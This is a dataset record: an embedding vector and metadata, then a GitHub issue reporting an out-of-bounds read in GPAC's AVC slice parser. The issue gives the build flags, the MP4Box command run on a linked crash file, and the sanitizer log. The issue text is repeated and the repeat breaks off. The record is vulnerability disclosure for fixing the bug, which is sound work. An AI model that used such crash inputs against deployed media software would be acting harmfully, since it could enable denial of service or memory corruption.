0.013321099802851677, 0.010246999561786652, 0.008462488651275635, -0.020284876227378845, 0.004440366756170988, -0.03376630321145058, 0.004994540940970182, 0.011041665449738503, -0.003389526391401887, -0.02266887202858925, 0.004572810605168343, 0.029444439336657524, -0.00234391400590539, 0.001637254492379725, 0.0055626570247113705, -0.009048030711710453, -0.018054237589240074, -0.015976954251527786, 0.0004997155047021806, 0.006674491334706545, -0.010407326743006706, 0.01843065768480301, -0.006601298693567514, -0.006601298693567514, 0.017371105030179024, 0.008253365755081177, 0.00930594839155674, -0.004597208462655544, -0.0021313063334673643, -0.006806935649365187, -0.028524301946163177, -0.018639780580997467, 0.020326701924204826, -0.0007227794267237186, 0.007061367854475975, 0.030197281390428543, 0.0013619099045172334, 0.003316333517432213, 0.00033829911262728274, 0.015837538987398148, -0.01649278961122036, -0.0016259270487353206, -0.019490212202072144, 0.0030706145334988832, -0.0005315195303410292, -0.0013453543651849031, 0.018193652853369713, 0.010978927835822105, 0.001446430222131312, -0.003691011108458042, -0.02001998946070671, 0.004701769445091486, 0.0022358675487339497, 0.0362200066447258, 0.019490212202072144, 0.00849734153598547, -0.017189864069223404, 0.007918769493699074, -0.003196088131517172, -0.006528105586767197, -0.0005293411668390036, -0.01279132254421711, -0.014276091940701008, -0.0028004981577396393, -0.017092274501919746, -0.001639868482016027, 0.019964221864938736, 0.00390710448846221, -0.011215933598577976, -0.004429910331964493, -0.011906038038432598, -0.02719985879957676, 0.0127564687281847, 0.009459305554628372, 0.0016389971133321524, -0.008797083981335163, -0.020884361118078232, -0.00003774006472667679, -0.012923766858875751, 0.0053535345941782, 0.010776776820421219, 0.001166729023680091, -0.014499155804514885, -0.012456727214157581, 0.013822993263602257, -0.009278065524995327, 0.038255464285612106, 0.02343565598130226, 0.01774752512574196, 0.0024205923546105623, -0.009752077050507069, -0.0060052997432649136, 0.010009994730353355, 0.00327450898475945, -0.017956648021936417, 0.005444154143333435, 0.031201068311929703, 0.00320654409006238, 0.02343565598130226, -0.009278065524995327, -0.017775407060980797, 0.000734106928575784, 0.016799502074718475, -0.0009942029137164354, 0.011397173628211021, 0.0011980973649770021, -0.010721010155975819, 0.016478847712278366, -0.006461883429437876, -0.021497787907719612, -0.03217697516083717, -0.019880574196577072, 0.0031438074074685574, 0.021191073581576347, -0.005193207412958145, 0.0037642039824277163, 0.0018855873495340347, 0.010260941460728645, -0.005144412163645029, 0.019281089305877686, -0.017775407060980797, -0.0000011164088391524274, -0.0247182734310627, -0.012233663350343704, -0.0028388372156769037, 0.0011902552796527743, 0.020006047561764717, -0.04118318110704422, 0.0016825643833726645, 0.006057580001652241, -0.009563866071403027, -0.015544768422842026, 0.009452334605157375, 0.006395661272108555, -0.004708740394562483, 0.0031141818035393953, -0.02296164445579052, -0.027395039796829224, -0.029026195406913757, -0.0005254201241768897, 0.007340197917073965, 0.015712065622210503, -0.009096826426684856, 0.018026353791356087, -0.012658878229558468, -0.011892096139490604, -0.007988477125763893, -0.030057866126298904, -0.019810866564512253, -0.023630836978554726, -0.004360203165560961, 0.016269726678729057, -0.016687970608472824, -0.01728745549917221, -0.029779035598039627, -0.007765413261950016, 0.006629181560128927, -0.009703281335532665, -0.006733742542564869, -0.02181844227015972, -0.023881783708930016, -0.015238055028021336, 0.011940891854465008, 0.005081675481051207, -0.011090460233390331, 0.03281828388571739, -0.0022881480399519205, -0.012881942093372345, 0.015614476054906845, -0.0020877390634268522, -0.01327927503734827, 0.003781630890443921, -0.0009767761221155524, -0.016771620139479637, 0.008288219571113586, -0.02533169835805893, -0.02266887202858925, 0.0078072380274534225, -0.030782824382185936, -0.00722169503569603, 0.015210172161459923, 0.017371105030179024, -0.01671585440635681, -0.00934080220758915, -0.007723588962107897, 0.008992264978587627, 0.004851640667766333, 0.03267886862158775, -0.011738739907741547, 0.010240028612315655, 0.008636756800115108, 0.010881338268518448, -0.020563706755638123, -0.011801476590335369, -0.007772384211421013, -0.004820272326469421, 0.00848340056836605, 0.003830426139757037, -0.0059774164110422134, -0.009333832189440727, 0.03661036863923073, 0.0003899262228514999, -0.010003023780882359, 0.015753891319036484, 0.011857242323458195, -0.015098640695214272, 0.005465066526085138, 0.021107425913214684, 0.011926949955523014, -0.008692522533237934, -0.004576296079903841, -0.0017662133323028684, 0.006507193204015493, -0.009403538890182972, 0.0052176048047840595, 0.020563706755638123, -0.023268356919288635, -0.02271069772541523, -0.014401565305888653, -0.008044243790209293, -0.020466117188334465, 0.00022306393657345325, -0.009940287098288536, 0.008218511939048767, 0.00817668717354536, 0.003610847517848015, 0.019964221864938736, 0.0010403841733932495, 0.016841327771544456, -0.007883915677666664, 0.031535662710666656, -0.0003705388226080686, 0.0020040899980813265, -0.005771779455244541, 0.0008347471011802554, -0.019169557839632034, 0.01243581436574459, -0.002218440640717745, -0.005569627974182367, -0.009103797376155853, -0.02558264508843422, 0.0025303815491497517, 0.01717592403292656, -0.002375282347202301, 0.013335040770471096, -0.02555476315319538, -0.009884520433843136, 0.004457793198525906, -0.014917400665581226, 0.015210172161459923, 0.01040035579353571, -0.006677976809442043, 0.01203848235309124, -0.005973930936306715, -0.017454752698540688, -0.007423846982419491, 0.012428844347596169, 0.029667504131793976, 0.004785418510437012, -0.020284876227378845, 0.016548555344343185, -0.02184632420539856, 0.03744686022400856, -0.0009942029137164354, -0.000836925464682281, -0.006855730898678303, 0.007050911895930767, 0.0026210013311356306, -0.004517044872045517, -0.0036875258665531874, -0.009717223234474659, 0.028719482943415642, 0.012651908211410046, 0.0038792213890701532, 0.007946653291583061, 0.025568705052137375, 0.003358157817274332, 0.013537192717194557, 0.0037676894571632147, 0.010030906647443771, -0.004691313486546278, 0.02091224491596222, 0.016046661883592606, -0.007890886627137661, 0.012568258680403233, -0.0020703121554106474, -0.013188655488193035, -0.013021357357501984, -0.0012268517166376114, 0.006946350447833538, 0.007207753602415323, 0.0027952699456363916, -0.017454752698540688, 0.00855310820043087, 0.01742687076330185, 0.015335645526647568, -0.0017095759976655245, -0.00026924515259452164, 0.019992105662822723, -0.006329439114779234, -0.001076109241694212, 0.01094407495111227, -0.006838303990662098, 0.010734952054917812, 0.005120014306157827, 0.01282617636024952, -0.00014377168554347008, 0.0034086958039551973, -0.01385087613016367, -0.007071823813021183, -0.006925438065081835, 0.001784511492587626, -0.01635337434709072, -0.0015597048914059997, -0.029416557401418686, 0.02275252155959606, -0.016952859237790108, -0.0125264348462224, -0.008929528295993805, -0.001591073232702911, -0.004635547287762165, 0.02202756330370903, -0.02947232313454151, 0.00004021795029984787, -0.025345640257000923, -0.002633200027048588, 0.04383206367492676, 0.010198204778134823, -0.015098640695214272, 0.006803450174629688, 0.0022585224360227585, -0.008887703530490398, 0.0062562464736402035, -0.01717592403292656, -0.000575958052650094, -0.003105468349531293, 0.0015492488164454699, -0.014345799572765827, -0.013335040770471096, -0.00775147182866931, -0.02457885816693306, -0.0016320263966917992, 0.00880405493080616, -0.041378360241651535, 0.0033860409166663885, -0.01085345447063446, 0.00107349525205791, 0.006259731948375702, -0.0017444296972826123, -0.02008969523012638, 0.016437023878097534, 0.013056211173534393, -0.004478705581277609, 0.005865884479135275, -0.00986360851675272, 0.013000445440411568, 0.006779052782803774, 0.0018315641209483147, -0.010219116695225239, -0.005126985255628824, 0.03050399385392666, -0.0037188942078500986, -0.000015847559552639723, 0.002708135638386011, 0.010156380012631416, -0.016339434310793877, 0.027938758954405785, 0.00226897862739861, 0.02166508510708809, 0.011285641230642796, -0.007974536158144474, -0.030559759587049484, 0.004391571506857872, 0.0046390327624976635, -0.003347701858729124, 0.026293661445379257, -0.01699468307197094, -0.006677976809442043, -0.013502338901162148, -0.014429448172450066, -0.003799057798460126, 0.02285011298954487, 0.01299347449094057, 0.0007550191367045045, -0.0107070691883564, 0.0009724193369038403, 0.02400725707411766, 0.016729796305298805, -0.0031751757487654686, 0.0017714413115754724, 0.0031525208614766598, 0.018319126218557358, 0.013160772621631622, 0.005576598457992077, 0.007284431718289852, -0.01642308197915554, 0.0013941496144980192, -0.022376101464033127, 0.019169557839632034, -0.004363688174635172, -0.007409905083477497, 0.014666453935205936, -0.010881338268518448, -0.005980901885777712, 0.0006522006005980074, -0.006988175213336945, -0.002267235890030861, 0.0020598559640347958, 0.014429448172450066, 0.010581595823168755, 0.007800267077982426, 0.002647141693159938, 0.002127820858731866, -0.013355953618884087, -0.01550294365733862, 0.005660247523337603, -0.015028933063149452, -0.007946653291583061, -0.019532036036252975, -0.011961803771555424, 0.002756930887699127, 0.0017400729702785611, 0.02113530784845352, 0.012951649725437164, -0.015447177924215794, 0.01045612245798111, 0.014415507204830647, 0.01562841795384884, 0.002277691848576069, 0.002267235890030861, 0.012205779552459717, 0.018625838682055473, -0.004677372053265572, 0.011885125190019608, 0.00264191348105669, 0.002917258068919182, -0.005792691837996244, 0.009006206877529621, 0.015349587425589561, 0.00011038833326892927, -0.007131075486540794, 0.010316707193851471, 0.00824639480561018, -0.0012129101669415832, 0.011285641230642796, 0.008741318248212337, -0.0181100033223629, 0.005346563644707203, 0.0016921490896493196, -0.0002581355220172554, 0.0038687651976943016, -0.021748734638094902, 0.004356717690825462, -0.009717223234474659, 0.010630390606820583, 0.008406721986830235, -0.019490212202072144, -0.010198204778134823, 0.010372472926974297, -0.004450822714716196, -0.004517044872045517, -0.0018768738955259323, -0.006904526147991419, 0.010184262879192829, 0.015976954251527786, -0.007883915677666664, -0.001448172959499061, 0.0024049081839621067, 0.007092736195772886, 0.010128497146070004, 0.002917258068919182, -0.022515516728162766, -0.0024031654465943575, -0.008720406331121922, 0.021720850840210915, 0.0050398507155478, -0.01735716313123703, -0.006064550951123238, -0.002563492627814412, 0.010511888191103935, -0.013572046533226967, -0.003171690506860614, 0.015447177924215794, 0.0014638571301475167, 0.033292293548583984, 0.005517347250133753, 0.012735556811094284, -0.005224575754255056, 0.01774752512574196, -0.005308224819600582, -0.018807077780365944, 0.010435209609568119, 0.008392781019210815, -0.0010926647810265422, 0.01119502168148756, 0.003959384746849537, -0.005520832724869251, 0.010309736244380474, -0.0015719037037342787, -0.022933760657906532, 0.019880574196577072, -0.001833306741900742, 0.018737370148301125, 0.009919374249875546, 0.008790113031864166, 0.01493134256452322, -0.002471130108460784, 0.015279879793524742, -0.00616214144974947, -0.007535378914326429, 0.006475824862718582, 0.01804029569029808, -0.015321704559028149, 0.0016503246733918786, -0.004889979958534241, 0.014080910943448544, -0.03755839169025421, -0.005782235413789749, 0.019685393199324608, -0.02601483277976513, -0.021177133545279503, -0.011710857041180134, -0.0005981773138046265, -0.0006883613532409072, 0.002483329037204385, 0.027980582788586617, -0.004611149895936251, -0.0023177736438810825, 0.02008969523012638, -0.0121848676353693, 0.020103637129068375, 0.005489463917911053, 0.017259571701288223, -0.0021365343127399683, -0.0031560061033815145, 0.0010743665043264627, -0.007270490285009146, -0.010379443876445293, -0.002742989454418421, -0.011843301355838776, 0.010365502908825874, 0.009710252285003662, 0.02073100581765175, -0.0029277142602950335, -0.02961173839867115, -0.0037537477910518646, -0.009814813733100891, -0.0015021961880847812, -0.01196877472102642, 0.008880733512341976, 0.0037781454157084227, 0.011578412726521492, 0.002558264648541808, 0.006353836972266436, 0.017120158299803734, 0.009319890290498734, -0.01674373634159565, -0.005670703481882811, -0.006210936699062586, 0.01169691514223814, 0.013843906112015247, 0.006357322447001934, 0.02353324554860592, 0.02357506938278675, -0.02922137640416622, 0.004053490236401558, -0.02353324554860592, -0.016004838049411774, 0.012798293493688107, -0.013411719352006912, -0.00930594839155674, 0.007103192154318094, -0.029695387929677963, 0.0035603095311671495, -0.00398029712960124, -0.024913454428315163, 0.0033860409166663885, 0.004276554100215435, 0.012122130952775478, 0.002223668619990349, 0.006057580001652241, -0.010546742007136345, 0.004795874934643507, -0.013209567405283451, -0.024774039164185524, 0.009027118794620037, 0.014073940925300121, 0.010874367319047451, 0.020145462825894356, -0.01908590830862522, 0.005402329843491316, 0.014889517799019814, 0.00030954479007050395, -0.0038129992317408323, -0.004576296079903841, -0.020814653486013412, 0.009319890290498734, -0.013809052295982838, 0.012916795909404755, 0.005064248573035002, -0.0058414870873093605, 0.016520673409104347, 0.0175384022295475, -0.00012623588554561138, 0.0020459145307540894, 0.011167138814926147, -0.023296240717172623, -0.004203360993415117, -0.004482191056013107, -0.014129706658422947, 0.006144714541733265, -0.010121526196599007, 0.005754352547228336, -0.011676003225147724, -0.006047124043107033, 0.008093038573861122, 0.003546368097886443, 0.0023195163812488317, -0.022292451933026314, -0.019002258777618408, 0.011348377913236618, -0.013983320444822311, -0.005060763098299503, 0.00927109457552433, 0.003527198452502489, 0.012080306187272072, -0.003987268079072237, 0.002997421659529209, -0.006855730898678303, -0.0008857206557877362, -0.010804659686982632, 0.017872998490929604, -0.004844669718295336, 0.005921650677919388, -0.014847693964838982, 0.015042874030768871, 0.01573994942009449, -0.009201387874782085, -0.0026244865730404854, 0.0032657955307513475, -0.016980743035674095, -0.01117410883307457, -0.0022358675487339497, 0.000786823220551014, 0.008943470194935799, 0.002127820858731866, 0.007835120894014835, -0.015767831355333328, -0.002448475221171975, 0.01817971095442772, 0.0051025873981416225, 0.01797058805823326, 0.029305025935173035, -0.005768293980509043, -0.015753891319036484, -0.006754654925316572, 0.020675238221883774, 0.004541442263871431, 0.021860266104340553, -0.010658273473381996, -0.008504312485456467, 0.015447177924215794, 0.007375051733106375, 0.022013623267412186, 0.01861189678311348, -0.022180920466780663, -0.007200782652944326, 0.009724193252623081, -0.01624184288084507, -0.008169717155396938, 0.008950440213084221, 0.004548413213342428, 0.009821783751249313, 0.015238055028021336, 0.009445363655686378, 0.004827243275940418, -0.008364898152649403, 0.014764044433832169, 0.014889517799019814, -0.0008412821916863322, -0.008462488651275635, 0.0006308527081273496, 0.01257522962987423, 0.013662666082382202, -0.010023935697972775, -0.0030183340422809124, -0.0036387306172400713, -0.010407326743006706, -0.012303370051085949, -0.013516280800104141, 0.0025704633444547653, -0.025345640257000923, 0.0049178628250956535, -0.024411559104919434, 0.03398936614394188, 0.016074545681476593, 0.018876785412430763, -0.010630390606820583, 0.009138651192188263, -0.006364292930811644, 0.009710252285003662, 0.00679996469989419, -0.01961568556725979, -0.008692522533237934, -0.034407611936330795, -0.012728585861623287, -0.012707673944532871, 0.003473175223916769, 0.004273068625479937, -0.009250182658433914, 0.0043985419906675816, -0.006876642815768719, -0.01306318212300539, -0.013955437578260899, 0.03382207080721855, 0.011822388507425785, 0.006095919292420149, 0.010274882428348064, 0.011836330406367779, -0.03867371007800102, 0.007458700332790613, 0.003250111360102892, 0.03351535648107529, 0.003333760192617774, -0.02213909663259983, -0.005886796861886978, 0.0038617944810539484, 0.0010874366853386164, -0.0007336712442338467, 0.004740108735859394, -0.002948626410216093, 0.011243816465139389, 0.010463092476129532, 0.0026854807510972023, -0.006667520385235548, 0.010288824327290058, -0.0027098783757537603, 0.0026018316857516766, 0.013739344663918018, -0.0036491865757852793, 0.00887376256287098, 0.01011455524712801, 0.0022951187565922737, -0.011236845515668392, -0.00599135784432292, 0.010951044969260693, -0.015321704559028149, 0.01129958312958479, 0.0010429981630295515, -0.009236241690814495, -0.013049240224063396, 0.0006347737507894635, 0.007092736195772886, 0.015586593188345432, 0.007263519335538149, 0.01444339007139206, -0.02296164445579052, 0.007570232264697552, 0.0013828221708536148, 0.006155170500278473, -0.030448228120803833, -0.018918611109256744, 0.0016851783730089664, -0.011097431182861328, 0.008183658123016357, -0.002152218483388424, -0.001781897502951324, -0.02888678014278412, -0.008079096674919128, -0.013955437578260899, 0.003569022985175252, -0.00013582066458184272, 0.0014542723074555397, 0.007486583665013313, 0.02626577951014042, 0.038283348083496094, 0.0016468391986563802, 0.0009236241457983851, 0.003176918486133218, 0.017008624970912933, -0.012268517166376114, 0.0013863075291737914, -0.022334277629852295, -0.006859216373413801, 0.025387464091181755, 0.014248209074139595, 0.008141833357512951, -0.0016311550280079246, -0.0014420734951272607, 0.0097939008846879, 0.0010700098937377334, 0.005782235413789749, 0.006664035376161337, 0.005088645964860916, 0.0020040899980813265, 0.008371868170797825, -0.00799544807523489, 0.010588566772639751, -0.0030009071342647076, -0.000746305740904063, 0.006061065476387739, 0.027590220794081688, -0.007002116646617651, 0.03198179230093956, 0.01854218915104866, -0.0029538546223193407, 0.019099850207567215, 0.02008969523012638, -0.010895279236137867, 0.000060503916756715626, 0.018096061423420906, 0.027185916900634766, 0.006071521434932947, 0.016325492411851883, 0.0036491865757852793, -0.02102377638220787, 0.02899831160902977, -0.0005480750696733594, 0.02443944290280342, 0.012010599486529827, 0.0243697352707386, -0.015935130417346954, 0.011146225966513157, -0.014568863436579704, 0.024746155366301537, 0.005151382647454739, 0.0005594025133177638, -0.003401725087314844, -0.011006811633706093, 0.015210172161459923, 0.04656459763646126, -0.018026353791356087, -0.0023195163812488317, -0.018054237589240074, 0.006995145697146654, -0.004325349349528551, -0.024523092433810234, 0.019936339929699898, 0.0031037256121635437, -0.000038339116144925356, 0.007340197917073965, -0.011773593723773956, 0.0024571886751800776, -0.00517578050494194, 0.0013793368125334382, -0.0003748955496121198, 0.013432631269097328, -0.0017121899873018265, -0.01710621640086174, -0.004715710878372192, 0.004147595260292292, -0.001257348689250648, 0.00796059425920248, 0.01792876422405243, 0.007507495582103729, -0.008134863339364529, -0.023226533085107803, -0.007835120894014835, -0.007284431718289852, 0.009912404231727123, -0.019378678873181343, -0.0018786166328936815, -0.011913008987903595, 0.006576900836080313, -0.007779354695230722, -0.008204570971429348, -0.022111212834715843, 0.005628879182040691, 0.001911727711558342, -0.003635245142504573, -0.03892465680837631, -0.004440366756170988, -0.007932711392641068, 0.00932686123996973, 0.003987268079072237, -0.0030706145334988832, -0.012770410627126694, -0.005336107686161995, -0.030029982328414917, 0.00902014784514904, -0.0020964525174349546, -0.0009942029137164354, -0.020173344761133194, 0.012728585861623287, 0.006615240126848221, -0.0019744643941521645, -0.02590329945087433, -0.001016857917420566, 0.027088327333331108, -0.0003038810391444713, 0.020466117188334465, 0.008629785850644112, -0.005398844368755817, 0.008218511939048767, -0.0019622656982392073, 0.010184262879192829, -0.004328834358602762, -0.0006439228309318423, 0.00907591450959444, 0.002368311630561948, 0.01585148088634014, -0.01562841795384884, -0.014513097703456879, -0.002701164921745658, -0.0003289321903139353, -0.005674188956618309, -0.013690548948943615, 0.00528382696211338, 0.0005001511890441179, 0.014527038671076298, -0.008016359992325306, 0.003020076546818018, 0.011592353694140911, 0.00848340056836605, 0.020103637129068375, 0.004307922441512346, -0.015544768422842026, 0.020187286660075188, -0.0037293501663953066, 0.014847693964838982, -0.018695546314120293, -0.0075284079648554325, -0.029834801331162453, -0.004517044872045517, 0.006772081833332777, 0.008615844883024693, -0.015684183686971664, 0.010240028612315655, 0.005231546238064766, -0.02863583341240883, 0.018946493044495583, -0.006116831675171852, 0.016897093504667282, -0.00031085178488865495, -0.023198649287223816, 0.010686157271265984, 0.007256548851728439, -0.010574624873697758, 0.032901931554079056, -0.0309780053794384, -0.007291402667760849, -0.029332907870411873, -0.014415507204830647, 0.005329136736690998, -0.0035289411898702383, -0.011292612180113792, 0.013042270205914974, -0.05113741010427475, -0.008971353061497211, 0.01915561594069004, 0.02888678014278412, 0.002605317160487175, 0.011153196915984154, -0.009605690836906433, 0.0007449986878782511, -0.003333760192617774, 0.006169111933559179, 0.005367476027458906, 0.017580226063728333, -0.009870579466223717, 0.000308891263557598, 0.013516280800104141, -0.005646306090056896, -0.01688315160572529, 0.04405512660741806, 0.009807842783629894, 0.02102377638220787, 0.01461068820208311, 0.0015405353624373674, 0.012735556811094284, -0.002586147515103221, -0.012630995362997055, -0.007974536158144474, 0.02239004336297512, 0.0011161910369992256, -0.005580083932727575, 0.01494528353214264, -0.007361109834164381, -0.00964751560240984, 0.011703886091709137, -0.01074192300438881, 0.005304739344865084, -0.013265334069728851, -0.024774039164185524, -0.021553553640842438, 0.0005694229621440172, 0.02626577951014042, -0.026544608175754547, 0.0010255713714286685, 0.00468782801181078, 0.004381115082651377, -0.01056765392422676, 0.007040455471724272, 0.007563261780887842, 0.02489951252937317, -0.02220880426466465, -0.017273513600230217, 0.020968010649085045, -0.005025909282267094, -0.007033484987914562, 0.02177661657333374, 0.015865422785282135, -0.0015692897140979767, -0.010846484452486038, -0.00598438736051321, 0.012045452371239662, -0.002943398430943489, 0.009208357892930508, 0.015056815929710865, -0.0053535345941782, -0.006995145697146654, 0.002985222963616252, 0.012345194816589355, 0.002727305283769965, 0.008692522533237934, -0.001688663731329143, -0.010867396369576454, 0.01494528353214264, -0.0068940697237849236, -0.008504312485456467, 0.00327450898475945, -0.006312012206763029, -0.000748919730540365, -0.02314288355410099, -0.007612057030200958, -0.007451729848980904, -0.01235913671553135, 0.0001985574053833261, -0.026474900543689728, -0.009877550415694714, 0.010253970511257648, 0.012212750501930714, -0.022041505202651024, 0.00932686123996973, 0.0002740375348366797, 0.0069393799640238285, -0.011327465996146202, 0.001964008202776313, -0.022194862365722656, -0.01778934895992279, 0.0021400197874754667, -0.005329136736690998, -0.001134489313699305, 0.00047836758312769234, -0.00792574044317007, -0.004147595260292292, 0.011104402132332325, -0.006590842269361019, 0.007375051733106375, -0.018807077780365944, -0.009312919341027737, -0.021971797570586205, 0.0022567796986550093, 0.0223203357309103, 0.024230320006608963, 0.006632667034864426, -0.02501104399561882, -0.009633573703467846, 0.012366106733679771, -0.00823245383799076, -0.015405353158712387, -0.017412928864359856, -0.0005959989503026009, 0.013369894586503506, -0.00563236465677619, 0.027395039796829224, -0.02580570988357067, -0.007138045970350504, 0.02368660271167755, -0.02605665661394596, 0.0005986129981465638, -0.00496665807440877, -0.006144714541733265, -0.0021260781213641167, 0.010616449639201164, 0.00443688128143549, -0.01430397480726242, 0.0007009958499111235, 0.01468039583414793, 0.00038251979276537895, -0.003799057798460126, 0.013467485085129738, 0.00005301580677041784, -0.004238214809447527, -0.004482191056013107, -0.0181100033223629, 0.04430607333779335, 0.016046661883592606, 0.007347168400883675, -0.019099850207567215, 0.016144253313541412, 0.01990845613181591, -0.006106375250965357, 0.015321704559028149, -0.002948626410216093, -0.019099850207567215, 0.006325954105705023, 0.019030142575502396, 0.013676607981324196, 0.022334277629852295, -0.020103637129068375, 0.012282458133995533, 0.02464856579899788, -0.00025247177109122276, -0.017622051760554314, 0.047847215086221695, 0.003255339339375496, 0.01541929505765438, -0.003865279722958803, 0.00047008981346152723, -0.0057369256392121315, 0.005733440164476633, 0.0025791767984628677, -0.01444339007139206, 0.009013176895678043, 0.009772988967597485, -0.00035441896761767566, 0.0031438074074685574, 0.004862096626311541, -0.004785418510437012, 0.031424131244421005, 0.007556290831416845, -0.03741897642612457, 0.011808447539806366, -0.011829359456896782, 0.0022759493440389633, -0.0003518049488775432, 0.011355348862707615, 0.017705699428915977, 0.012895883992314339, -0.0013444829965010285, -0.007270490285009146, 0.022627048194408417, 0.008288219571113586, -0.01858401484787464, -0.010497946292161942, 0.009640544652938843, -0.019894514232873917, 0.012637966312468052, 0.01599089615046978, 0.018444599583745003, -0.005106072872877121, 0.006176082883030176, -0.004405512940138578, 0.004447337239980698, 0.003304134588688612, -0.00285277864895761, 0.01990845613181591, 0.04550504311919212, -0.005398844368755817, -0.008204570971429348, -0.020103637129068375, 0.011592353694140911, -0.003105468349531293, 0.0063050417229533195, -0.03072705864906311, 0.00930594839155674, 0.0018542190082371235, -0.02425820380449295, 0.025387464091181755, 0.019922398030757904, 0.005099102389067411, 0.023602953180670738, 0.004032577853649855, 0.011425056494772434, -0.035160452127456665, -0.020006047561764717, 0.022445809096097946 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Version ``` MP4Box - GPAC version 2.3-DEV-rev1-g4669ba229-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce complie and run ``` ./configure --enable-sanitizer --enable-debug make ./MP4Box -dxml buffer_overflow_av_parsers_c_5684 ``` information reported by sanitizer ``` [isom/avcc] Missing REXT profile signaling, patching. [iso file] Box "stsz" (start 771) has 40 extra bytes [iso file] Unknown box type 00000000 in parent moov [isom/avcc] Missing REXT profile signaling, patching. [iso file] Box "stsz" (start 771) has 40 extra bytes [iso file] Unknown box type 00000000 in parent moov [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 21 [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! media_tools/av_parsers.c:5684:21: runtime error: index 128 out of bounds for type 'AVC_SPS [32]' ``` # Poc https://drive.google.com/file/d/1wf2-Yk4cijCPcQd33P9PQ8ADokG_sG4i/view?usp=sharing
Buffer overflow in function avc_parse_slice of media_tools/av_parsers.c:5684
https://api.github.com/repos/gpac/gpac/issues/2366/comments
0
2022-12-21T05:53:36
2023-01-04T09:56:09Z
https://github.com/gpac/gpac/issues/2366
1,505,749,285
2,366
false
This is a GitHub Issue repo:gpac owner:gpac Title : Buffer overflow in function avc_parse_slice of media_tools/av_parsers.c:5684 Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Version ``` MP4Box - GPAC version 2.3-DEV-rev1-g4669ba229-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce complie and run ``` ./configure --enable-sanitizer --enable-debug make ./MP4Box -dxml buffer_overflow_av_parsers_c_5684 ``` information reported by sanitizer ``` [isom/avcc] Missing REXT profile signaling, patching. [iso file] Box "stsz" (start 771) has 40 extra bytes [iso file] Unknown box type 00000000 in parent moov [isom/avcc] Missing REXT profile signaling, patching. [iso file] Box "stsz" (start 771) has 40 extra bytes [iso file] Unknown box type 00000000 in parent moov [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [avc-h264] Unknown aspect_ratio_idc: your video may have a wrong aspect ratio. Contact the GPAC team! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [avc-h264] invalid SPS: log2_max_frame_num_minus4 shall be less than 12, but is 21 [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream 